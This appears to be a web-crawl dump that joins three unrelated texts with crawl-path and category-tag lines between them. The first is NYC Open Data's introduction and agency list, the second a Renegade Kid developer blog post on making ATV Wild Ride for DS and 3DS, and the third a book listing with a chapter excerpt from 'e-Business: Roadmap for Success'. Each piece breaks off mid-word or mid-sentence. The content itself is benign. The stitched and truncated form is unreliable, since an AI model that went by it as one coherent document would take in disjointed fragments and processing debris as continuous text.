Submitting City Agencies are the authoritative source of data available on NYC OpenData. These entities are responsible for data quality and retain version control of data sets and feeds accessed on the Site. Data may be updated, corrected, overwritten and/or refreshed at any time. The anticipated update frequency is indicated for each data set on the Site. Older versions of data sets will not be retained.
NYC Open Data makes the wealth of public data generated by various New York City agencies and other City organizations available for public use. As part of an initiative to improve the accessibility, transparency, and accountability of City government, this catalog offers access to a repository of government-produced, machine-readable data sets.
Anyone can use these data sets to participate in and improve government by conducting research and analysis or creating applications, thereby gaining a better understanding of the services provided by City agencies and improving the lives of citizens and the way in which government serves them.
The data sets are available in a variety of machine-readable formats and are refreshed when new data becomes available. Data is presented by category, by City agency, or by other City organization. Descriptions of the data, the collection method, and other contextual material, called metadata, make the data sets easier to understand and use. Use of these data sets and how they are generated can be better understood by reading the Terms of Use.
How the City Uses Data to Create a Better City
The Mayor’s Office of Data Analytics (MODA), the Department of Information Technology and Telecommunications (DOITT), and NYC Digital work together to collect, analyze, and share NYC Data, to create a better City supported by data-based decision making, and to promote public use of City data.
The City of New York is a national model for collecting data to measure government performance. Agencies routinely collect data on buildings, streets, infrastructure, businesses, and other entities within the City, including permits, licenses, crime related data, and 311 complaints. MODA centralizes City data, uniting previously disconnected pieces of information from various agencies, and pairs it with NY state, federal, and other open data to create a comprehensive City-wide data platform that serves as a record of City activity, and a foundation for NYC Open Data. DoITT and MODA work closely together to use that platform, DataBridge, to reduce safety risk in the City, deliver daily services more efficiently, and enforce laws more effectively.
The mission of NYC Digital is to realize New York City's potential as the world's leading digital city, by creating meaningful public-private partnerships that serve New Yorkers and support economic development. NYC Digital produces the City's Digital Roadmap, NYC's technology plan for access, education, open government, engagement, and industry. In partnership with MODA, NYC Digital directs Code Corps, the nation's first municipal program that engages vetted volunteer technologists to support City emergency and disaster recovery needs.
Administration for Children's Services (ACS)
Alliance for Downtown New York
Banking Commission
Board of Correction (BOC)
Board of Elections (BOENY)
Board of Standards and Appeals (BSA)
Bronx Borough President (BPBX)
Brooklyn Borough President (BPBK)
Brooklyn Public Library (BPL)
Business Integrity Commission (BIC)
Campaign Finance Board (CFB)
City Clerk & Clerk of the Council (OCC)
City Council (NYCC)
City Employees' Retirement System (NYCERS)
City University of New York (CUNY)
Civilian Complaint Review Board (CCRB)
Commission on Human Rights (CCHR)
Commission on Women's Issues (CWI)
Commission to Combat Police Corruption (CCPC)
Conflicts of Interest Board (CONFLICTS)
Department for the Aging (DFTA)
Department of Buildings (DOB)
Department of City Planning (DCP)
Department of Citywide Administrative Services (DCAS)
Department of Consumer Affairs (DCA)
Department of Correction (DOC)
Department of Cultural Affairs (DCLA)
Department of Design and Construction (DDC)
Department of Environmental Protection (DEP)
Department of Finance (DOF)
Department of Health and Mental Hygiene (DOHMH)
Department of Homeless Services (DHS)
Department of Housing Preservation and Development (HPD)
Department of Information Technology & Telecommunications (DoITT)
Department of Investigation (DOI)
Department of Parks and Recreation (DPR)
Department of Probation (DOP)
Department of Records and Information Services (RECORDS)
Department of Sanitation (DSNY)
Department of Small Business Services (SBS)
Department of Transportation (DOT)
Department of Youth and Community Development (DYCD)
Economic Development Corporation (EDC)
Equal Employment Practices Commission (EEPC)
Financial Information Services Agency (FISA)
Fire Department of New York City (FDNY)
Fire Department Pension Fund & Related Funds
Health and Hospitals Corporation (HHC)
Human Resources Administration (HRA)
Landmarks Preservation Commission (LPC)
Latin Media & Entertainment Commission (LMEC)
Law Department (LAW)
Loft Board (LOFT)
Manhattan Borough President (MBPO)
Mayor's Office of Adult Education (ADULTED)
Mayor's Office of Data Analytics (MODA)
Mayor's Office of Long-Term Planning and Sustainability (OLTPS)
Mayor's Office of Media And Entertainment (MOME)
Mayor's Office of Operations (OPS)
Mayor's Office to Combat Domestic Violence (OCDV)
Metropolitan Transportation Authority (MTA)
New York City Housing Authority (NYCHA)
New York City Tax Commission (TAXC | 计算机 |
2015-48/3679/en_head.json.gz/12889 | The Wild Ride of Development
Renegade Kid’s start was somewhat of an explosive one
with the release of Dementium: The Ward. It was the right game, in the right
market, at the right time. It put our company on the map – at least within the
Nintendo DS community.
The success of our debut title lead to the development of
Moon, which may not have met with the same success in terms of sales, but it
connected with fans thanks to improved story-telling and sense of adventure –
scoring higher with reviewers across the board.
With SouthPeak's purchase of Gamecock, Dementium II was
born and enabled us to pour more resources than we ever had into the
development of a game. The result was something very special with variety and
gore to please those who appreciate such things.
In terms of development, we were building some great
momentum as a team and felt very fortunate to have developed three first-person
shooters in a row. However, the market was changing. It was 2010 and everyone
seemed to be cranking their “mitigating risk” levers up to the max!
Publishers have always been tight with their cash, understandably,
but it was getting to the point where we could not find any publishing partners
willing to invest in the development of… well, anything really.
Forget original adventure games, we couldn’t even land
license game gigs! It was a very difficult time for developers in the industry
as a whole, and the DS market was no exception. We needed to get creative! We
needed to find a way to land a deal and still try to have fun doing what we do.
I turned to the data. The sales data, that is. Looking at
which games sold well in the past does not predict the future, but it shows you where audiences have existed, which at least suggests they may still
exist.
After filtering out all of the Nintendo games and big
license games (movie and TV tie-ins) you are left with virtual pet games, racing games, and… not very
much else in terms of consistent genres that performed well in the DS market.
Huh, well that’s a bit depressing.
Believe it or not, we did actually create a concept for a
virtual pet game, but never found a home for it. That’s probably a good thing.
And with regards to the racing genre, many of them utilized licensed vehicles
and such to help promote them. That is, except one specific racing genre.
There was a number of ATV racing games released on the DS
that sold quite well. At least enough to show there’s potential for investment
there. I immediately tracked them all down and played them. Unfortunately, none
of them were fun to play. Fortunately, none of them were fun to play! This gave
us an opportunity to actually offer a good ATV racing game for the DS market.
The ATV racing genre is an interesting one. At the time, I
was not sure if the term “ATV” was owned by someone. Was it something that
needed to be licensed, y’know, kind of like NBA and stuff like that.
Apparently, the answer to that is a wonderful “no”. It is just a general term,
kind of like SUV.
It just so happened that I had been playing Pure on the
Xbox 360 around that time, and found it to be tremendous fun. More on that
Now, the reason I wanted to find a genre that had sold
well was primarily to sell the idea to a publisher. Even if you present a
publisher with an outstanding game concept, if you can’t back it up with sales
data you’re going to have a tough time convincing them to invest their money
into the development of the game.
So, we had a genre that had generally performed quite
well in the DS market. There are a handful of ATV titles that sold a
respectable amount. From this we can present a decent justification for why a
new (and better?) ATV game is a great choice for the DS market, right? In
theory, yes, but…
In reality, it was a tough slog trying to find a home for
the game. At that point we were just sending out pitch documents to publishers, which explained the features of the game and sales data on how previous ATV titles had
performed in the market. It wasn’t working, so we needed to step up our game
a bit.
If you have played
Moon, on the DS, you’ll be familiar with the buggy sections. My hope was to use
this as the foundation for our new ATV racing game. In the span of just two weeks we
cobbled together a playable demo of an ATV racing game. It did not feature everything
the game needed, but it demonstrated the basic concept and, if I may be so bold
to say, proved that a good ATV racing game could be achieved on the DS!
We started shopping the playable demo around to
publishers, and got some good feedback. Things were starting to look a bit more
promising. However, no contracts were being sent to us despite it being a somewhat “safe”
proposal. It was time to get even more creative!
We looked at our development budget and cut it in half,
offering publishers a co-development deal. This reduces the financial risk
publishers need to take, off-loading a large amount of it onto us, while also offering us the
opportunity to make more money on the back-end in royalties.
Yes, we got a bite! The fine folks at Destineer were
on-board with the new proposal and we went full-steam towards completing
development of the game. Working with Tony and Matt at Destineer was great. The
executive producers/producers you work with at a publisher can make all of the
difference. Thanks to the fact that both Tony and Matt are great people, the development process fun and creative.
Our focus was to try and capture the excitement and energy of Pure. Even if were able to capture only an ounce of what Pure offered, we felt that we'd have a fun game on our hands. To me, that means exotic locations, big jumps, cool tricks, and nitro boosts!
Despite all of this goodness, the short version of how well
the game performed in the DS market is: not good. We won’t
know how well it could have performed in the DS market due to the unfortunate fact that Destineer was in a difficult
situation at the time and unable to distribute the game as originally planned. Some copies went out to retail, but it was a very limited run. It was no fault of Destineer’s. It was just bad timing.
ATV Wild Ride on the DS was received well in the press
with Destructoid scoring it 8/10 calling it, “One of the best racer offerings
on Nintendo’s handheld to date.” Games Abyss scored it 9.5/10 saying, “ATV Wild
Ride not only delivers on the fun factor, it makes me appreciate the genre a
whole lot more than I ever would have imagined.”
So, the idea of bringing ATV Wild Ride to the 3DS was not
a difficult one for us to decide. We have faith in the game. It delivers fun! Now, due to the fact that we have been busy working
on a multitude of different games for the 3DS, and other platforms, it has taken a little
longer than originally expected to complete. But, we’re nearly finished!
As with the DS version, we initially pitched the game to
publishers for a retail release, but got no bites due to the newness of the 3DS
platform and the early negative reports of the 3DS and how it was doomed due to
the mobile market. I am thankful this happened. Not only has the 3DS market
grown to be a very successful one, it has also given us the opportunity to
publish it ourselves on the Nintendo eShop.
Our focus for ATV Wild Ride 3D has been to create an
enhanced port of the DS game. The sad fact is that practically no one bought
the original DS version of the game. However, even those 10 people who did
purchase the DS will hopefully agree that the 3DS version is closer to a
console racing experience than ever before. Not only have we upgraded the art,
with the fancy tricks the 3DS affords such as, specular highlights, mip-maps,
higher resolution textures, real-time lighting, shadow maps, and the like – we have
also been able to work on the physics; adding suspension to the ATVs. This is a
relatively subtle addition that, in my opinion, improves how the game feels.
We have fully funded the development of ATV Wild Ride 3D.
This not only means the cost of creating the game itself, but also additional
expenses such as the QA team to ensure the game is bug free and ready for
Nintendo’s lotcheck. And, now we’re in the final stretch. This is the first
week of what we’re expecting (hoping) to be a three week QA focus before we
submit the game to Nintendo for their approval. The game is already very solid,
so I think we’re in good shape.
Now starts the PR push. With little to no money to spend
on advertising, we just have to put our thinking caps on and try to drum up
some exposure and interest in the game. We have created a 3D trailer for the
eShop, which will hopefully be included in the “Coming Soon!” section in the
next few weeks. We will send the game out to the press a week or two before the
launch for previews, reviews, and interviews.
And then, we wait for the game to launch, which as of
today looks like March 2013. We would like to release the game in the US and
Europe at the same time, but it depends on when we receive age rating from PEGI,
USK and COB. We already have the ESRB rating. In fact, I got it within 10
minutes of applying for it. ESRB are great. The others need to follow suit. So,
if the game does not release in Europe at the same time as the US, you’ll know
why. That would make me sad, but we cannot risk missing this quarter with the US
release of the game.
Will the game sell well or w | 计算机 |
2015-48/3679/en_head.json.gz/13362 | e-Business: Roadmap for Success (Information Technology Series)
Ravi Kalakota, Marcia Robinson
Alan Taetle, Former Executive Vice President of MindSpring and General Partner of the Venture Capital Firm, Noro-Moseley Partners This is the first book on e-business to combine a clarity of vision that will help you to appreciate the true significance of e-business, with a rigorous roadmap for reinventing your business design. If…
(First Edition)
Alan Taetle, Former Executive Vice President of MindSpring and General Partner of the Venture Capital Firm, Noro-Moseley Partners This is the first book on e-business to combine a clarity of vision that will help you to appreciate the true significance of e-business, with a rigorous roadmap for reinventing your business design. If you want to avoid being blindsided by your competition, you must make this book required reading in your organization. Mohanbir Sawhney, Tribune Professor of Electronic Commerce and Technology, Kellogg Graduate School of Management, Northwestern University As e-commerce solutions, enterprise applications, and business models converge in new ways, a tidal wave of change is transforming industries, redefining competitive strategies, and annihilating traditional thinking. To survive and thrive in the e-commerce world, all companiesfrom established industry leaders to feisty upstartsare remaking themselves into lean, mean e-business machines that serve, delight, and retain customers better than ever before. How do they do it? Not with new products or innovative technology, but with superior e-business designs. Startups and some nimble incumbents have each created an e-business design by which they serve customers, differentiate their supply chains, integrate their selling chains, procure products, and nurture relationships. e-Business: Roadmap for Success illustrates how managers are rewiring the enterprise to confront the e-commerce onslaughtuprooting traditional business applications as we know them. The authors create an innovativeapplication framework for structural migration from a legacy model to an e-business model. Drawing on their experience with and research of leading businesses, Kalakota and Robinson identify the fundamental design principles for building the e-business blueprint. Read More
Booknews
Surveys how some successful companies have redesigned their structure and practices to do business on the Internet, and glean from them fundamental design principles for building an electronic business blueprint. Annotation c. Book News, Inc., Portland, OR (booknews.com)
Addison Wesley Longman, Inc.
Information Technology Series
E-Commerce - Management
E-Commerce - Reference
Read an Excerpt Chapter One From e-Commerce to e-Business What to Expect New economy new tools, new rules. Few concepts have revolutionized business more profoundly than e-commerce. Simply put, the streamlining of interactions, products, and payments from customers to companies and from companies to suppliers is causing an earthquake in many boardrooms. Managers are being forced to reexamine traditional definitions of value as we enter a new millennium. To thrive in the e-commerce world, companies need to structurally transform their internal foundations to be effective. They need to integrate their creaky applications into a potent e-business infrastructure. In this chapter, we'll look at the mechanics of e-business and its impact. We describe what e-business is and how it is changing the market. Included are steps you can take to disaggregate and reaggregate value chains to create the e-business model. ·How did Amazon.com, an online bookstore that started in 1995 with two employees in a rundown warehouse in Seattle, grow revenues in only three years to more than $600 million in 1998, outmaneuvering the two 800-pound gorillas in the book retail business, Barnes & Noble and Borders Books & Music? ·Why is it that consumers can go online to buy a $1,999 built-to-order PC from Gateway Computer, but they cannot go online to buy a customized $5,000 color copier from Xerox? ·Why can you trade stocks and options online through Charles Schwab, butyou can't go online to view or make changes to your Cigna or Kaiser health insurance plan? ·Why does it take only a few minutes to choose a flight, buy an airline ticket, and reserve a hotel room and a car through Microsoft Expedia, an integrated online travel transaction site, but it takes twice that long to speak with an American, United or Delta travel agent? ·How can FedEx and UPS make it easy for customers to track their packages, create airbills, and schedule pickups on the Web, but banks cannot tell their customers the status of online bill payments made to the local phone company? · Why is it that Cisco, an internetworking company that makes routers and switches, can overhaul its product line every two years, but Kodak cannot seem to deliver rapid innovations to meet changing customer requirements? In short, what makes some companies successful in the digital economy? Visionary companies understand that current business designs and organizational models are insufficient to meet the challenges of doing business in the e-commerce era. If you take a close look at such leading businesses as Dell, Cisco, and Amazon.com, you'll find a new business design, one that emphasizes a finely tuned integration of business, technology, and process. In many cases, these companies are tapping technology to streamline operations, boost brands, improve customer loyalty, and, ultimately, drive profit growth. Visionary firms are setting new rules within their industries via new technobusiness designs, new interenterprise processes, and integrated operations to support changing customer requirements. They realize that the next wave of customer-centric innovation requires businesswide integration of processes, applications, and systems on an unprecedented scale. We call this businesswide integration e-business, the organizational foundation that can support business in the Net economy, and it's forcing companies to ask three questions: 1. How will e-commerce change our customer priorities? 2. How can we construct a business design to meet these new customer priorities? 3. What technology investments must we make to survive, let alone thrive? Look around your own company. Look at the problems that are preoccupying senior management, and look at current priorities: market share versus short-term profits, revenue growth versus cost. What are the high-profile projects that have been initiated or proposed recently to accomplish these priorities? Now think about the digital future and analyze your company's ability to compete with new entrants that don't have your company's baggage: legacy applications, calcified processes, and inflexible business models. Next, ask yourself questions about strategy: Does my senior management have a clear understanding of how our industry is being shaped by new e-business developments? Do they suffer from flawed assumptions, or blind spots, in interpreting industry-level changes? Do they recognize the threat posed by new and unconventional rivals? Are they willing to make changes to the business model before it's too late? Are they setting the right priorities to be rule makers, rather than rule takers? Now be brutally honest with yourself about your company's readiness to execute change. Does management understand the implementation side of strategy? Do they know that the entire business platform is being transformed by a new generation of enterprise applications? Do they understand the risks, challenges, and difficulties in integrating and implementing complex enterprise applications necessary for an e-business enterprise? Do they understand what it takes to build interenterprise applications such as supply chain management, which is the backbone of e-business? These are not rhetorical questions. Thoughtful answers will help you shape the transformation agenda that forms the e-business backbone. Our goal is to show the logic of e-business, so that everyone on your management team can participate in creating a new infrastructure. If understanding is to be our guiding principle, then many enlightened managers are better than one. If technology is to be our driving force, then its principles must be accessible to management, not reserved, as is sometimes the case, for only an anointed few who have managed to penetrate its thick fog and hype. So let's get started in linking today's business with tomorrow's technology. Linking Today's Business with Tomorrow's Technology It's happening right before our eyes: a vast and quick reconfiguration of commerce on an evolving e-business foundation. What is the difference between e-commerce and e-business? We define e-commerce as buying and selling over digital media. e-Business, in addition to encompassing e-commerce, includes both front- and back-office applications that form the engine for modern business. e-Business is not just about e-commerce transactions; it's about redefining old business models, with the aid of technology, to maximize customer value. e-Business is the overall strategy, and e-commerce is an extremely important facet of e-business. Why is e-business a big deal? CEOs everywhere are faced with shareholder demands for double-digit revenue growth, no matter what the business environment is. They've already reengineered, downsized, and cut costs. Consequently, CEOs are investigating new strategic initiatives to deliver results, and many are looking at using technology to transform the business modelin other words, harnessing the power of e-business. e-Business is being driven by a profound, evolving development: Every day, more and more individuals and companies worldwide are being linked electronically. While on the surface this does not appear to be a big deal, digitally binding consumers and companies in a low-cost way is as significant as the invention of the steam engine, electricity, the telephone, and the assembly line. It's causing the stodgy old conventions of business built on information asymmetry to be cast aside. So it's no surprise that the rules of the game are being rewritten (see Table 1.1). Let's start by looking at the first rule of e-business: Technology is no longer an afterthought in forming business strategy, but the actual cause and driver. While the effect of technology on business strategy may not be clear initially, it is relentless and cumulative, like the effects of water over time. Technology comes in waves. As the ocean erodes the shore, so will technology erode strategies, causing an entire business model to behave in hard-to-predict ways. Consequently, e-commerce is not something that businesses can ignore. e-Commerce poses the most significant challenge to the business model since the advent of computing itself. While the computer automates tasks, increasing business speed, it hasn't fundamentally altered the business foundation; e-commerce does. If any entity in the value chain begins to do business electronically, companies up and down that value chain must follow suit, or risk being substituted. Therefore, rethinking and redesigning the business model is not one of many options available to management, it is the first step to profiting even surviving in the information era. Are executives at large companies aware that the impact of these changes is of seismic proportions? Some are; most are not. The majority of managers are too busy dealing with a multitude of operational problems. Executives can't afford to think too much as they try to get more juice from their current business models. Time is tight; resources are tighter. If they sit around inventing elegant strategies and then try to execute them through a series of flawless decisions, the current business is doomed. If they don't think about the future, the business is doomed. To do business differently, managers must learn to see differently. As John Seely Brown, chief scientist of Xerox, puts it, "Seeing differently means learning to question the framework through which we view and frame competition, competencies and business models." Maintaining the status quo is not a viable option. Unfortunately, too many companies develop a pathology of reasoning, learning, and attempting to innovate only in their own comfort zones. The first step to seeing differently is to understand that e-business is about structural transformation. e-Business = Structural Transformation If e-commerce innovation is the cause of a revolution in the rules of business, what is the effect? In short, structural transformation. The results are a growing pace of application innovation, new distribution channels, and competitive dynamics that are baffling even the smartest managers. As technology permeates everything we do, business transformation is becoming harder to manage because the issues of change play out on a much grander scale. Increasingly, value is found not in tangible assets such as products, but in intangibles: branding, customer relationship, supplier integration, and the aggregation of key information assets. This observation leads to the second rule of e-business: The ability to streamline the structure and to influence and control the flow of information is dramatically more powerful and cost-effective than moving and manufacturing physical products. This rule is the core driver of structural transformation. Ironically, it seems that few companies have developed the necessary information-centric business designs to deal with the issues of business change and innovation. Changing the flow of information requires companies to change not just the product mix, but perhaps more important, the business ecosystem in which they compete. Unless an enterprise develops an explicit strategy to accommodate the accelerated flow of information, the enterprise will find itself scrambling, working harder and faster just to stay afloat. There is always hope that some magical silver bullet will appear and pierce the walls blocking the smooth flow of information, but that isn't likely. Transformation Stakes Are Very High Why do successful firms fail? The marketplace is cruel to companies that don't adapt to change. History shows that organizations best positioned to seize the future rarely do so. As Alvin Toffler pointed out in Future Shock, either we do not respond at all or we do not respond quickly enough or effectively enough to the change occurring around us. He called our paralysis in the face of demanding change "future shock." Too often, senior managers fail to anticipate change, become overconfident, lack the ability to implement change, or fail to manage change successfully. For example, in the 1980s, IBM and Digital Equipment were positioned to own the PC market, but they did nothing when upstarts such as Compaq, Dell, and Gateway took the market by storm. Why? Because their commitment and attention were directed elsewhere. Even as late as the early 1990s, Digital's official line was that PCs represented a niche market with only limited growth potential. Digital Equipment dug itself into a hole from which it was impossible to escape and consequently was acquired by Compaq, a company it could have bought many times over in the 1980s. In hindsight, Digital's management should have transformed its business design to rely less on mainframe computers and more on tapping into the PC, client/server, and Web revolution. As this case illustrates, perhaps the greatest threat companies face today is adjusting to nonstop change in order to sustain growth. Constant change means organizations must manufacture a healthy discomfort with the status quo, develop the ability to detect emerging trends faster than the competition, make rapid decisions, and be agile enough to create new business models. In other words, to thrive, companies will need to exist in a state of perpetual transformation, continuously creating fundamental change. Throw in the resulting time-to-market pressures, and you have a serious challenge indeed. This observation leads us to the third rule of e-business: Inability to overthrow the dominant, outdated business design often leads to business failure. If a business design is faulty or built on old assumptions, no amount of fixing and patching will do any good for competing in the digital economy. It's become accepted wisdom that the survival of a company depends on its ability to anticipate, gauge, and respond to changing customer demands in a timely manner. Standing still and waiting for the silver bullet leads only to heartbreak, and working harder and longer leads only to companywide frustration. Neither is realistic for addressing an issue that affects the very future of the enterprise: How should a company design itself to compete in the new, networked economy? e-Business Requires Flexible Business Designs In order to deal with change, companies and autonomous business units need an effective business design that allows them to react rapidly and continuously, innovate ceaselessly, and take on new strategic imperatives faster and more comfortably. Are companies organized to deal with dynamic change? Not really. Virtually every enterprise finds itself stretched to the limit, attempting to maintain viability and profitability in the face of unparalleled uncertainty and change in every dimension of its business environment. And there is no relief in sight. To deal with dynamic change, many organizations have sought refuge in outsourcing, the argument for which is simple: Individual companies simply cannot do everything well. True enough. In the first generation of outsourcing, the focus was on gaining efficiency and cost reduction, not on pleasing customers. For instance, because of the increasing complexity of computers and networks, more and more firms began outsourcing their technology management. Among the biggest beneficiaries of this trend have been computer service firms, such as IBM, Andersen Consulting, and EDS. BellSouth outsourced its entire information technology (IT) function to EDS and Andersen Consulting in a contract worth more than $4 billion. But the outsourcing boom extends well beyond computers. In recent years, outsourcing in the form of contract manufacturing has caught on considerably as companies search for ways to cut costs. Examples of contract manufacturing abound in the high-tech industry: Solectron, Flextronics, and SCI Systems. Outsourcing is changing the nature of the relationship between contract manufacturers and the original equipment manufacturers (OEMs). In the past, they danced like detached partners, but now they're cheek to cheek. Why? If the objective is to please customers, the best relationship for both parties is to behave as a single companytruly cooperative and integrated. This means that firms have to share sensitive design information, link internal applications systems, and provide shared services throughout the supply chain. In a growing number of cases, outsourcers finish the product, slap on the logo, and ship it to the user or distributor. It's the wave of the future. As companies face complex business challenges, they increasingly farm out many tasks to cut down on time to market. Increasingly, new entrants in e-business use outsourcing alliances as a business model to gain market position against a leader. This strategy is often called GBF, "get big fast." This new generation of outsourcing alliances is called a variety of names, including e-business communities, clusters, and coalitions. While successful strategies differ widely from industry to industry, a common thread runs through them. They all seek to nullify the advantages of the leader by using outsourcing to quickly create reputation, economies of scale, cumulative learning, and preferred access to suppliers or channels. Amazon.com successfully attacked Barnes & Noble using this strategy, and Yahoo! used it to overtake Microsoft Network in the portal business. This trend brings us to the fourth rule of e-business: The goal of new business designs is to create flexible outsourcing alliances between companies that not only off-load costs, but also make customers ecstatic. With emerging technology, outsourcing alliances are becoming less painful to implement, especially if both sides are using similar business application software. This trend makes every market leader vulnerable. Distributors are especially threatened, because new online intermediaries are able to replicate their business model at a very low cost. New entrants in the distribution business are differentiating themselves in two key ways: They're easy to do business with, and they add value through innovative services, such as inventory management. Ease of doing business is seen as critical as costs go down, even if the new entrant does not lower prices. Complex outsourcing arrangements are not optional anymore: They are the only way companies can fill voids in their arsenals. Currently, there are very few guidelines for managers to follow as they go about the task of creating new business designs that leverage outsourcing. Still, in our work with several leading companies, we find a recurring theme that firms are implementing to fashion new business models: disaggregation and reaggregation. Value Chain Disaggregation and Reaggregation The value of any business is in the needs being served, not the products being offered. Disaggregation allows firms to separate the means (products) from the ends (customer needs). Disaggregation requires identifying, valuing, and nurturing the true core of the business: the underlying needs satisfied by the company's products and services. This approach allows managers to disassemble the old structure, rethink core capabilities, and identify what new forms of value can be created. Intel, with its constant innovation in chip design and manufacturing, is a prime example of the disaggregation and reaggregation strategy. Disaggregation is crucial for leaders such as Intel because successful organizations may need to abandon old paradigms (systems, strategies, and products) while they possess equity. The foresight to cannibalize a working business design takes courage because it involves risk, but the payoff can be enormous. Reaggregation enables businesses to create a configuration that streamlines the entire value chain. It can also help to create an unparalleled customer experience that satisfies a need while engaging, intriguing, and connecting clients. Evidence abounds that new reaggregated business designs are being built on a well-integrated set of enterprise software applications (or killer apps). These enterprise applications represent the backbone of the modern corporation. Reaggregation enables new entrants to compete differently, even though they're competing with the same scope of activities as well-established leaders. Amazon.com reaggregated the value chain to perform individual activities differently, although it offers the same scope of activities as leader Barnes & Noble. The objective of reaggregation is to either lower cost or enhance differentiation. Using technology to reaggregate value chains is central to the digital economy. The Road Ahead: Steps to a New Beginning The steps in disaggregation and reaggregation follow a systematic logic, and they're the same for everybodystartups, visionary firms, and established companies: 1. Challenge traditional definitions of value. 2. Define value in terms of the whole customer experience. 3. Engineer the end-to-end value stream. 4. Integrate, integrate, and integrate some more. Create a new technoenterprise foundation that is customer-centric. 5. Create a new generation of leaders who understand how to create the digital future by design, not by accident. Let's focus on established companies, because they need the most help in transforming themselves. It is critical for established companies to understand that we are at a crossroads in history, a time when e-commerce is making a transition from the fringe market, dominated by innovators and early adopters, to the mainstream market, dominated by pragmatic customers seeking new forms of value. Established companies that don't pay attention to this shift are going to face hard times. Why is it difficult for established companies to see the writing on the wall? Primarily because most want to "stick to the knitting," that is, to continue to do what made them successful. They don't want to cannibalize existing product lines, and they tend to fall back on simple formulas: lower cost, operational efficiency, increased product variety. They should look at technology as a way to make their lives easier and give them more value for their money. Established companies must challenge traditional definitions of value. They must learn to take advantage of new technologies to create and deliver new streams of value. Challenge Traditional Definitions of Value Customers want companies that they do business with to continuously improve the following: · Speed. Service can never be too fast. In a real-time world, there is a premium on instant, accurate, and adaptive response. Visionary companies embrace constant change and consistently deconstruct and reconstruct their products and processes to provide faster service. · Convenience. Customers value the convenience of one-stop shopping, but they also want better integration between the order entry, fulfillment, and deliveryin other words, better integration along the supply chain. · Personalization. Customers want firms to treat them as individuals. Artificial constraints on choice are being replaced with the ability to provide the precise product customers desire. · Price. Nothing can be too affordable. Companies that offer unique services for a reasonable price are flourishing, benefiting from a flood of new buyers. In every business, managers should ask how they can use new technology to create a new value proposition for the customer. If they figure it out, they will succeed. Lots of firms are already doing it, including such companies as Domino's Pizza, Dell, Amazon.com, and Auto-By-Tel. These visionary companies are meeting new customer expectations by improving products, cutting prices, or enhancing service quality. Domino's Pizzas mission is to be the leader in off-premise pizza convenience to consumers around the world. Founded in 1960 by Thomas S. Monaghan, Domino's owes its success to a few simple precepts. The company offers a limited menu through carryout and delivery, and every pizza is delivered with a Total Satisfaction Guarantee: Any customer not completely satisfied with the Domino's Pizza experience will be offered a replacement pizza or a refund. By raising the quality of service and the level of innovation that customers expect, market leaders like Domino's are constantly pushing the competitive frontiers into uncharted territories and driving their slower-moving competition back to the drawing board. The ability to view the world from the customer's perspective often prevents visionary companies from starting in the wrong place and ending up at the wrong destination. Innovators look for what new things customers value, rather than focusing on differences among customers. Often companies rely too much on market segmentation and forget that segmentation techniques work well only in stable settings. Segmentation is difficult to execute in a turbulent environment in which the value proposition constantly changes. e-Commerce Is Changing the Notion of Value In subtle ways, e-commerce is fundamentally changing the customer value proposition. In recent years, value innovation across all service dimensionsspeed, convenience, personalization, and pricehas accelerated due to technological innovations such as the Web and e-commerce. These innovations have substantially changed the underlying value proposition, which in turn has changed the capabilities and competencies needed by companies. What do we mean by value innovation? Faced with similar products, too many options, and lack of time, the customer's natural reaction is to simplify by looking for the cheapest, the most familiar, or the best-quality product. Obviously, companies want to locate themselves in one of these niches. A product or service that is 98 percent as good, isn't familiar, or costs 50 cents more is lost in a no man's land. Companies that follow middle-of-the-road strategies will underperform. This leads to the fifth rule of e-business: e-Commerce is enabling companies to listen to their customers and become either "the cheapest," "the most familiar," or "the best." "The cheapest" isn't synonymous with inferior. It means a value-oriented format that has taken out many of the inventory and distribution costs, such as Southwest's "No Frills Flying" and Wal-Mart's "Every Day Low Prices." The best example of the value-oriented format is Wal-Mart, which helped define a revolution in American retailing with its discount superstore format. That format, combined with friendly customer service, superb inventory management, and an entrepreneurial corporate atmosphere, helped the company steamroll competition. Recently, Wal-Mart has taken "the cheapest" model and applied it to the grocery business. The company is experimenting with 40,000-square-foot Wal-Mart Neighborhood Markets that will compete head on with grocers. With "the most familiar," customers know what they're getting. McDonald's is a great example of a familiar brand. Often visitors to foreign countries seek local McDonald's just because they know what to expect. It took the brand giants of the past, such as McDonald's and Coca-Cola, decades to make their products household names. By contrast, it's taken so-called Internet megabrands, such as America Online and Yahoo!, only a few years to carve out strong identities. Being "the best" involves reinventing service processes, being able to turn the company on a dime, and raising relationships with customers and suppliers to unprecedented levels of intimacy. The most obvious example of the best in exceptional service is American Express, exemplified in their Return Protection Plan. This customer benefit refunds cardmembers for items purchased with an Amex card within 90 days from the date of purchase, if the store won't accept returns. Amex will refund the cardmember's account for the purchase price, up to $300 per item, up to $1,000 per year. By continuously generating innovative improvements to customer service and benefits, Amex retains high customer loyalty. Wherever firms are in the value continuum, customers want continuous innovation. Microsoft CEO Bill Gates calls it the "What have you done for me lately" syndrome. Faced with the burden of increasing time pressure and decreasing service levels, customers are no longer content with the status quo. They want companies to innovate and push service to a new frontier to make their lives easier in some way. Clearly, companies are caught in the midst of a tornado of spiraling business transformation. A good example is the book retailing industry. Learning from Value Innovation in the Book Retailing Industry The story of the Internet book retailing war between market leader Barnes & Noble (B&N) and upstart Amazon.com is one of the most written about in recent years. At stake is a significant share of the worldwide book market, estimated to be more than $75 billion (international sales constitute some 30 percent of several players' online business). Given the high stakes, Amazon.com forced the entrenched leader, B&N, and to a lesser extent Borders, to respond to its challenge. Conventional logic dictates that B&N would dominate Amazon.com on the Internet due to its high name recognition, already advanced fulfillment process (it can leverage its catalog experience), and low prices (in contrast to smaller players, B&N purchases a large number of titles directly from publishers). One would also assume that online customers fit the same profile as those who shop in stores, that their needs are the same. True? No! The needs and demographics of the online customer are different. In preliminary research, B&N indicated that online book shoppers buy five to ten times as many books as traditional book buyers. Online book customers have an interesting profile: They live in remote or international locations; they're interested in incremental price savings (an estimated "all-in" savings of around 15 percent); they are pressed for time; and they don't mind waiting one to three days for delivery. Clearly, value is influenced by the demographics of online shoppers. At this stage, it is too early to declare the winner in the online book wars. It's fair to say, however, that market leaders will need to provide value by finding the most interesting and simple way to use the Web, providing the best service (via speed and control) and giving customers the lowest price, because it's so easy to point and click to the competition. What does this example mean for executives? Amazon.com has identified and innovated one component of value to a level of excellence that puts its competitors to shame. Jeff Bezos, CEO of Amazon.com, isn't unique. He's following the footsteps of other business entrepreneurs who took advantage of technology to build giant businesses from scratch: Sam Walton, Craig McCaw, Bill Gates, and Charles Schwab, to name only a few. The role of an executive is to help the company understand the threat posed by value migration. Some industries will be profoundly affected, while others will feel little impact. It's vital that executives 